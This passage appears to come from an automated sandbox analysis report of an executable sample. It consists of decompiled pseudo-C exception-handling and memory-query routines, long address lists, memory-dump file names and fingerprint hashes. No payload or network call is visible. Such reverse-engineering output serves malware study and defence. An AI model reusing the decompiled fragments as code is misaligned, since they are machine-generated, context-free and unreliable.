                                                                                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                                                                                        								goto L34;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                        							_t58 = _t25;
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                                                                                        									 *0x26fd2d8 = _t81;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                        								_t58 = _t28;
                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								L25:
                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        								if( *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                                        									goto L34;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L28;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                                        					goto L60;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}




































                                                                                                                                                                                                                        0x026fb117
                                                                                                                                                                                                                        0x026fb11a
                                                                                                                                                                                                                        0x026fb120
                                                                                                                                                                                                                        0x026fb13e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb13e
                                                                                                                                                                                                                        0x026fb128
                                                                                                                                                                                                                        0x026fb131
                                                                                                                                                                                                                        0x026fb137
                                                                                                                                                                                                                        0x026fb146
                                                                                                                                                                                                                        0x026fb149
                                                                                                                                                                                                                        0x026fb14c
                                                                                                                                                                                                                        0x026fb156
                                                                                                                                                                                                                        0x026fb156
                                                                                                                                                                                                                        0x026fb158
                                                                                                                                                                                                                        0x026fb15b
                                                                                                                                                                                                                        0x026fb15d
                                                                                                                                                                                                                        0x026fb15d
                                                                                                                                                                                                                        0x026fb15f
                                                                                                                                                                                                                        0x026fb162
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb164
                                                                                                                                                                                                                        0x026fb166
                                                                                                                                                                                                                        0x026fb1cc
                                                                                                                                                                                                                        0x026fb1cc
                                                                                                                                                                                                                        0x026fb32a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb32a
                                                                                                                                                                                                                        0x026fb168
                                                                                                                                                                                                                        0x026fb168
                                                                                                                                                                                                                        0x026fb16c
                                                                                                                                                                                                                        0x026fb16e
                                                                                                                                                                                                                        0x026fb16e
                                                                                                                                                                                                                        0x026fb16e
                                                                                                                                                                                                                        0x026fb16e
                                                                                                                                                                                                                        0x026fb171
                                                                                                                                                                                                                        0x026fb172
                                                                                                                                                                                                                        0x026fb175
                                                                                                                                                                                                                        0x026fb175
                                                                                                                                                                                                                        0x026fb179
                                                                                                                                                                                                                        0x026fb17d
                                                                                                                                                                                                                        0x026fb18b
                                                                                                                                                                                                                        0x026fb18b
                                                                                                                                                                                                                        0x026fb193
                                                                                                                                                                                                                        0x026fb199
                                                                                                                                                                                                                        0x026fb19b
                                                                                                                                                                                                                        0x026fb19d
                                                                                                                                                                                                                        0x026fb1ad
                                                                                                                                                                                                                        0x026fb1ba
                                                                                                                                                                                                                        0x026fb1be
                                                                                                                                                                                                                        0x026fb1c3
                                                                                                                                                                                                                        0x026fb1c5
                                                                                                                                                                                                                        0x026fb243
                                                                                                                                                                                                                        0x026fb243
                                                                                                                                                                                                                        0x026fb1c7
                                                                                                                                                                                                                        0x026fb1c7
                                                                                                                                                                                                                        0x026fb1c7
                                                                                                                                                                                                                        0x026fb245
                                                                                                                                                                                                                        0x026fb247
                                                                                                                                                                                                                        0x026fb328
                                                                                                                                                                                                                        0x026fb328
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb24d
                                                                                                                                                                                                                        0x026fb24d
                                                                                                                                                                                                                        0x026fb254
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb25a
                                                                                                                                                                                                                        0x026fb25e
                                                                                                                                                                                                                        0x026fb2ba
                                                                                                                                                                                                                        0x026fb2bc
                                                                                                                                                                                                                        0x026fb2c4
                                                                                                                                                                                                                        0x026fb2c6
                                                                                                                                                                                                                        0x026fb2c8
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2ca
                                                                                                                                                                                                                        0x026fb2d0
                                                                                                                                                                                                                        0x026fb2d2
                                                                                                                                                                                                                        0x026fb2d4
                                                                                                                                                                                                                        0x026fb2e9
                                                                                                                                                                                                                        0x026fb2e9
                                                                                                                                                                                                                        0x026fb2eb
                                                                                                                                                                                                                        0x026fb31a
                                                                                                                                                                                                                        0x026fb321
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb321
                                                                                                                                                                                                                        0x026fb2ef
                                                                                                                                                                                                                        0x026fb2f0
                                                                                                                                                                                                                        0x026fb2f2
                                                                                                                                                                                                                        0x026fb2f4
                                                                                                                                                                                                                        0x026fb2f4
                                                                                                                                                                                                                        0x026fb2f6
                                                                                                                                                                                                                        0x026fb2f8
                                                                                                                                                                                                                        0x026fb2fa
                                                                                                                                                                                                                        0x026fb30e
                                                                                                                                                                                                                        0x026fb30e
                                                                                                                                                                                                                        0x026fb311
                                                                                                                                                                                                                        0x026fb313
                                                                                                                                                                                                                        0x026fb313
                                                                                                                                                                                                                        0x026fb314
                                                                                                                                                                                                                        0x026fb314
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2fc
                                                                                                                                                                                                                        0x026fb2fc
                                                                                                                                                                                                                        0x026fb2fc
                                                                                                                                                                                                                        0x026fb305
                                                                                                                                                                                                                        0x026fb306
                                                                                                                                                                                                                        0x026fb308
                                                                                                                                                                                                                        0x026fb30a
                                                                                                                                                                                                                        0x026fb30a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2fc
                                                                                                                                                                                                                        0x026fb2fa
                                                                                                                                                                                                                        0x026fb2d6
                                                                                                                                                                                                                        0x026fb2dd
                                                                                                                                                                                                                        0x026fb2dd
                                                                                                                                                                                                                        0x026fb2df
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2e1
                                                                                                                                                                                                                        0x026fb2e2
                                                                                                                                                                                                                        0x026fb2e5
                                                                                                                                                                                                                        0x026fb2e7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2e7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2dd
                                                                                                                                                                                                                        0x026fb260
                                                                                                                                                                                                                        0x026fb263
                                                                                                                                                                                                                        0x026fb268
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb271
                                                                                                                                                                                                                        0x026fb273
                                                                                                                                                                                                                        0x026fb279
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb27f
                                                                                                                                                                                                                        0x026fb285
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb28b
                                                                                                                                                                                                                        0x026fb28d
                                                                                                                                                                                                                        0x026fb296
                                                                                                                                                                                                                        0x026fb29a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2a0
                                                                                                                                                                                                                        0x026fb2a3
                                                                                                                                                                                                                        0x026fb2a5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2ac
                                                                                                                                                                                                                        0x026fb2ae
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2b0
                                                                                                                                                                                                                        0x026fb2b4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb2b4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb19f
                                                                                                                                                                                                                        0x026fb19f
                                                                                                                                                                                                                        0x026fb19f
                                                                                                                                                                                                                        0x026fb1a6
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb1a8
                                                                                                                                                                                                                        0x026fb1a9
                                                                                                                                                                                                                        0x026fb1ab
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb1ab
                                                                                                                                                                                                                        0x026fb1d3
                                                                                                                                                                                                                        0x026fb1d5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb1e5
                                                                                                                                                                                                                        0x026fb1e7
                                                                                                                                                                                                                        0x026fb1e9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb1ef
                                                                                                                                                                                                                        0x026fb1f6
                                                                                                                                                                                                                        0x026fb222
                                                                                                                                                                                                                        0x026fb222
                                                                                                                                                                                                                        0x026fb224
                                                                                                                                                                                                                        0x026fb226
                                                                                                                                                                                                                        0x026fb23a
                                                                                                                                                                                                                        0x026fb23c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb228
                                                                                                                                                                                                                        0x026fb228
                                                                                                                                                                                                                        0x026fb228
                                                                                                                                                                                                                        0x026fb231
                                                                                                                                                                                                                        0x026fb232
                                                                                                                                                                                                                        0x026fb234
                                                                                                                                                                                                                        0x026fb236
                                                                                                                                                                                                                        0x026fb236
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb228
                                                                                                                                                                                                                        0x026fb1f8
                                                                                                                                                                                                                        0x026fb1f8
                                                                                                                                                                                                                        0x026fb1fb
                                                                                                                                                                                                                        0x026fb1fd
                                                                                                                                                                                                                        0x026fb20f
                                                                                                                                                                                                                        0x026fb20f
                                                                                                                                                                                                                        0x026fb212
                                                                                                                                                                                                                        0x026fb214
                                                                                                                                                                                                                        0x026fb214
                                                                                                                                                                                                                        0x026fb215
                                                                                                                                                                                                                        0x026fb215
                                                                                                                                                                                                                        0x026fb21b
                                                                                                                                                                                                                        0x026fb21b
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb1ff
                                                                                                                                                                                                                        0x026fb1ff
                                                                                                                                                                                                                        0x026fb1ff
                                                                                                                                                                                                                        0x026fb206
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb208
                                                                                                                                                                                                                        0x026fb208
                                                                                                                                                                                                                        0x026fb209
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb209
                                                                                                                                                                                                                        0x026fb20b
                                                                                                                                                                                                                        0x026fb20d
                                                                                                                                                                                                                        0x026fb220
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb220
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb20d
                                                                                                                                                                                                                        0x026fb17f
                                                                                                                                                                                                                        0x026fb182
                                                                                                                                                                                                                        0x026fb185
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb187
                                                                                                                                                                                                                        0x026fb189
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fb189
                                                                                                                                                                                                                        0x026fb14e
                                                                                                                                                                                                                        0x026fb150
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 026FB1BE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                                                                                        • Opcode ID: 84d562cb2239f3436bb226ff09e513c06bef0b706eff6a141cb181b4bda360b7
                                                                                                                                                                                                                        • Instruction ID: 7b11d901668a459acf227afff26b40093e12ed9a821a688fdd01f70faa85c1ef
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84d562cb2239f3436bb226ff09e513c06bef0b706eff6a141cb181b4bda360b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8619131A406028BDFA9CE29D8D077D73A6EF4E35CB649529DB05C7290E730E882C784
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                                        			E021921D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                        				signed int* _t43;
                                                                                                                                                                                                                        				char _t44;
                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                        				long _t66;
                                                                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                                                                        				signed int* _t82;
                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t43 = _t84;
                                                                                                                                                                                                                        				_t65 = __ebx + 2;
                                                                                                                                                                                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                        				_t89 = _t95;
                                                                                                                                                                                                                        				_t96 = _t95 - 8;
                                                                                                                                                                                                                        				_push(_t65);
                                                                                                                                                                                                                        				_push(_t84);
                                                                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                                                                        				asm("cld");
                                                                                                                                                                                                                        				_t66 = _a8;
                                                                                                                                                                                                                        				_t44 = _a4;
                                                                                                                                                                                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                        					_push(_t89);
                                                                                                                                                                                                                        					E0219233B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                        					_t46 = 1;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_v12 = _t44;
                                                                                                                                                                                                                        					_v8 = _a12;
                                                                                                                                                                                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                        					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                        					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                        					_t49 = E021923F5(_t66);
                                                                                                                                                                                                                        					_t99 = _t96 + 4;
                                                                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                                                                        								L8:
                                                                                                                                                                                                                        								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t54 =  *_t53();
                                                                                                                                                                                                                        								_t89 = _t89;
                                                                                                                                                                                                                        								_t86 = _t86;
                                                                                                                                                                                                                        								_t66 = _a8;
                                                                                                                                                                                                                        								_t55 = _t54;
                                                                                                                                                                                                                        								_t106 = _t54;
                                                                                                                                                                                                                        								if(_t106 == 0) {
                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									if(_t106 < 0) {
                                                                                                                                                                                                                        										_t46 = 0;
                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                        										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                        										E021922E0(_t55, _t66);
                                                                                                                                                                                                                        										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                        										E0219233B(_t89, _t66, 0);
                                                                                                                                                                                                                        										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                        										E021923D7(_t82[2]);
                                                                                                                                                                                                                        										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                        										_t66 = 0;
                                                                                                                                                                                                                        										_t86 = 0;
                                                                                                                                                                                                                        										 *(_t82[2])(1);
                                                                                                                                                                                                                        										goto L8;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                                        						_t46 = 1;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				L13:
                                                                                                                                                                                                                        				return _t46;
                                                                                                                                                                                                                        			}























                                                                                                                                                                                                                        0x021921d8
                                                                                                                                                                                                                        0x021921d9
                                                                                                                                                                                                                        0x021921da
                                                                                                                                                                                                                        0x021921dd
                                                                                                                                                                                                                        0x021921df
                                                                                                                                                                                                                        0x021921e2
                                                                                                                                                                                                                        0x021921e3
                                                                                                                                                                                                                        0x021921e5
                                                                                                                                                                                                                        0x021921e6
                                                                                                                                                                                                                        0x021921e7
                                                                                                                                                                                                                        0x021921ea
                                                                                                                                                                                                                        0x021921f4
                                                                                                                                                                                                                        0x021922a5
                                                                                                                                                                                                                        0x021922ac
                                                                                                                                                                                                                        0x021922b5
                                                                                                                                                                                                                        0x021921fa
                                                                                                                                                                                                                        0x021921fa
                                                                                                                                                                                                                        0x02192200
                                                                                                                                                                                                                        0x02192206
                                                                                                                                                                                                                        0x02192209
                                                                                                                                                                                                                        0x0219220c
                                                                                                                                                                                                                        0x02192210
                                                                                                                                                                                                                        0x02192215
                                                                                                                                                                                                                        0x0219221a
                                                                                                                                                                                                                        0x0219229a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219221c
                                                                                                                                                                                                                        0x0219221c
                                                                                                                                                                                                                        0x02192228
                                                                                                                                                                                                                        0x0219222a
                                                                                                                                                                                                                        0x02192285
                                                                                                                                                                                                                        0x02192285
                                                                                                                                                                                                                        0x0219228b
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219222c
                                                                                                                                                                                                                        0x0219223b
                                                                                                                                                                                                                        0x0219223d
                                                                                                                                                                                                                        0x0219223e
                                                                                                                                                                                                                        0x0219223f
                                                                                                                                                                                                                        0x02192242
                                                                                                                                                                                                                        0x02192242
                                                                                                                                                                                                                        0x02192244
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192246
                                                                                                                                                                                                                        0x02192246
                                                                                                                                                                                                                        0x02192290
                                                                                                                                                                                                                        0x02192248
                                                                                                                                                                                                                        0x02192248
                                                                                                                                                                                                                        0x0219224c
                                                                                                                                                                                                                        0x02192254
                                                                                                                                                                                                                        0x02192259
                                                                                                                                                                                                                        0x0219225e
                                                                                                                                                                                                                        0x0219226a
                                                                                                                                                                                                                        0x02192272
                                                                                                                                                                                                                        0x02192279
                                                                                                                                                                                                                        0x0219227f
                                                                                                                                                                                                                        0x02192283
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192283
                                                                                                                                                                                                                        0x02192246
                                                                                                                                                                                                                        0x02192244
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219222a
                                                                                                                                                                                                                        0x0219229e
                                                                                                                                                                                                                        0x0219229e
                                                                                                                                                                                                                        0x0219229e
                                                                                                                                                                                                                        0x0219221a
                                                                                                                                                                                                                        0x021922ba
                                                                                                                                                                                                                        0x021922c1

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                        • Instruction ID: a05f4b9e5aa65ce88deb07d50cd806b7404aa8a6d1d31777827f186977daa9f8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9821C876940204AFDF14DF68CCC09ABBBA5FF48350B068168DD559B245D730FA15CBE0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                                        			E026FAEEC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                        				signed int* _t43;
                                                                                                                                                                                                                        				char _t44;
                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                        				long _t66;
                                                                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                                                                        				signed int* _t82;
                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t43 = _t84;
                                                                                                                                                                                                                        				_t65 = __ebx + 2;
                                                                                                                                                                                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                        				_t89 = _t95;
                                                                                                                                                                                                                        				_t96 = _t95 - 8;
                                                                                                                                                                                                                        				_push(_t65);
                                                                                                                                                                                                                        				_push(_t84);
                                                                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                                                                        				asm("cld");
                                                                                                                                                                                                                        				_t66 = _a8;
                                                                                                                                                                                                                        				_t44 = _a4;
                                                                                                                                                                                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                        					_push(_t89);
                                                                                                                                                                                                                        					E026FB053(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                        					_t46 = 1;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_v12 = _t44;
                                                                                                                                                                                                                        					_v8 = _a12;
                                                                                                                                                                                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                        					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                        					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                        					_t49 = E026FB10D(_t66);
                                                                                                                                                                                                                        					_t99 = _t96 + 4;
                                                                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                                                                        								L8:
                                                                                                                                                                                                                        								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t54 =  *_t53();
                                                                                                                                                                                                                        								_t89 = _t89;
                                                                                                                                                                                                                        								_t86 = _t86;
                                                                                                                                                                                                                        								_t66 = _a8;
                                                                                                                                                                                                                        								_t55 = _t54;
                                                                                                                                                                                                                        								_t106 = _t54;
                                                                                                                                                                                                                        								if(_t106 == 0) {
                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									if(_t106 < 0) {
                                                                                                                                                                                                                        										_t46 = 0;
                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                        										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                        										E026FAFF8(_t55, _t66);
                                                                                                                                                                                                                        										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                        										E026FB053(_t89, _t66, 0);
                                                                                                                                                                                                                        										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                        										E026FB0EF(_t82[2]);
                                                                                                                                                                                                                        										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                        										_t66 = 0;
                                                                                                                                                                                                                        										_t86 = 0;
                                                                                                                                                                                                                        										 *(_t82[2])(1);
                                                                                                                                                                                                                        										goto L8;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                                        						_t46 = 1;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				L13:
                                                                                                                                                                                                                        				return _t46;
                                                                                                                                                                                                                        			}























                                                                                                                                                                                                                        0x026faef0
                                                                                                                                                                                                                        0x026faef1
                                                                                                                                                                                                                        0x026faef2
